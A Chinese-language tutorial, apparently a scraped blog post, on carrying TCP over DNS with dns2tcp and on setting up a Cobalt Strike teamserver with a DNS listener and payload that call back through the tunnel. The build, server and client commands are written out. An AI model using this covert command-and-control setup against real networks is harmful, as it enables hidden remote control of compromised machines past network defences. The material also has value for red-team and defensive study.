天天看点

DNS隧道实战&&cobaltstrike利用dns隧道

前言

使用

dns

隧道进行

tcp

通信。

正文

首先配置域名

配置一个

A

记录指向我们的

vps

, 然后配置几个

ns

记录,指向刚刚设置的

A

记录

然后在服务端安装

wget https://launchpad.net/ubuntu/+archive/primary/+files/dns2tcp_0.5.2.orig.tar.gz
tar xvf dns2tcp_0.5.2.orig.tar.gz 
cd dns2tcp-0.5.2/
./configure 
make
sudo make install

           

新建一个配置文件

然后

dns2tcpd -f my.conf -F -d 2
           

接着在客户端 也安装好。

dns2tcpc -r socks -z ns10.hac425.top vps_ip -l 8888 -d 2
           

然后访问

B:8888

--->

vps_ip:1082

cobaltstrike

把下好的

cobaltstrike

传到

vps

, 装好

jdk

, 运行

./teamserver vps_ip password

然后本地运行

cobaltstrike.jar

, 连接上去,用户名随便写,密码就是运行

teamserver

设置的

password

, 在这里就是

1234

首先新建一个

listener

host

就是

vps

ip

填写设置好

ns

记录的 域名,以

,

 分割

然后新建

payload

生成文件,运行,过一会儿应该就有了。

此时还得等一会(

dns

比较慢)

变成这个样子就可以进行操作了。